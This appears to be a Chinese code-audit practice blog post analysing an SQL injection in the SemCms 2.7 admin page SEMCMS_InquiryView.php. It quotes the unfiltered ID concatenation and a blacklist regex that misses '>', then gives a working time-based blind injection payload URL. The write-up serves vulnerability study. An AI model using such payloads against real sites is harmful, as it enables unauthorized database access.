SemCms2.7 后台 SEMCMS_InquiryView.php SQL 注入
0x00前言
开始从小的漏洞开始练习,搬运项目地址:
https://github.com/imsebao/Code-Audit
0x01
SemCms 是一套开源外贸企业网站管理系统,主要用于外贸企业,兼容 IE、 Firefox 等主流浏览器。SemCms 使用 php 和 vb 语言编写,结合 apache 或 iis 运行。 SEMCMS_InquiryView.php 文件存在 SQL 注入漏洞。允许攻击者利用 漏洞直接操作网站数据库。
漏洞分析:www/ohbc_Admin/SEMCMS_InquiryView.php 文件 ID 参数 没有过滤 导致 sql 注入漏洞。
<?php include_once 'SEMCMS_Top_include.php'; ?> <body> <?php //?ˉ?ìD??¢ $sql="select * from sc_msg where ID=".$_GET['ID']; $query=mysql_query($sql); while($row=mysql_fetch_array($query)){ $PID=$row['msg_pid']; $email=$row['msg_email']; $message=$row['msg_content']; $IP=$row['msg_ip']; $time=$row['msg_time']; $names=$row['msg_name']; $tel=$row['msg_tel']; } //2ú?·D??¢ if ($PID!=0){ $sql="select * from sc_products where ID=".$PID; $query=mysql_query($sql); while($row=mysql_fetch_array($query)){ $productsname=$row['products_name']; } }else{$productsname="来自联系我们的留言";} ?> <table width="700" cellpadding="0" cellspacing="0" class="table"> <tr><td colspan="2" align="right" class="tdsbg"><span style=" float:left;"><?php echo $productsname;?></span><a href="javascript:TINY.box.hide()"><img src="SC_Page_Config/Image/icons/hr.gif" border="0" /></a></td></tr> <tr><td>姓名:</td><td><?php echo $names; ?></td></tr> <tr><td>电话:</td><td><?php echo $tel; ?></td></tr> <tr><td>邮箱:</td><td><?php echo $email; ?></td></tr> <tr><td>留言内容:</td><td><?php echo $message; ?></td></tr> <tr><td>来路IP:</td><td><?php echo $IP; ?></td></tr> <tr><td>时间:</td><td><?php echo $time; ?></td></tr> </table> </body> </html>
但是 semcms 有全局过滤,继续看 www/include/web_sql.php 文件
<?php /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ // 防 sql 入注 if (isset($_GET)){$GetArray=$_GET;}else{$GetArray='';} //get if (isset($_COOKIE)){$CookArray=$_COOKIE;}else{$CookArray='';} //cookie foreach ($GetArray as $value){//get verify_str($value); } foreach ($CookArray as $value){ //cookie verify_str($value); } function inject_check_sql($sql_str) { return preg_match('/select|insert|=|<|update|\'|\/\*|\*|union|into|load_file|outfile/i',$sql_str); } function verify_str($str) { if(inject_check_sql($str)) { exit('Sorry,You do this is wrong! (.-.)'); } return $str; }
这里对 get 请求进行了过滤。
return preg_match(‘/select|insert|=|<|update|‘|/*|*|union|into|load_file|outfile/i‘,$sql_str);
这段代码过滤了一些字符,但是 “>” 符号并没有进行过滤,我们可以用 “>” 进行延时注入。
漏洞复现:
用管理员账号登录后台,访问 payload。
Payload:
http://localhost/ohbc_Admin/SEMCMS_InquiryView.php?ID=33 and if(ascii(substring(user(),1,1))>113,sleep(5),1)
成功延时
emmm比前几天的直接拼接有趣些,但是这个过滤应该在现在应该不会出现了。之前审计的cms只要程序员能想起来过滤,基本上变量就被消毒的很彻底了,经过防注入函数和防xss函数之后很难这样直接的构造payload了。
相关推荐
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
tanrong 2020-06-11
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
明月清风精进不止 2020-06-13
godfather 2020-06-13
ItBJLan 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03
qshpeng 2020-05-11
明月清风精进不止 2020-05-07
gwn00 2020-05-07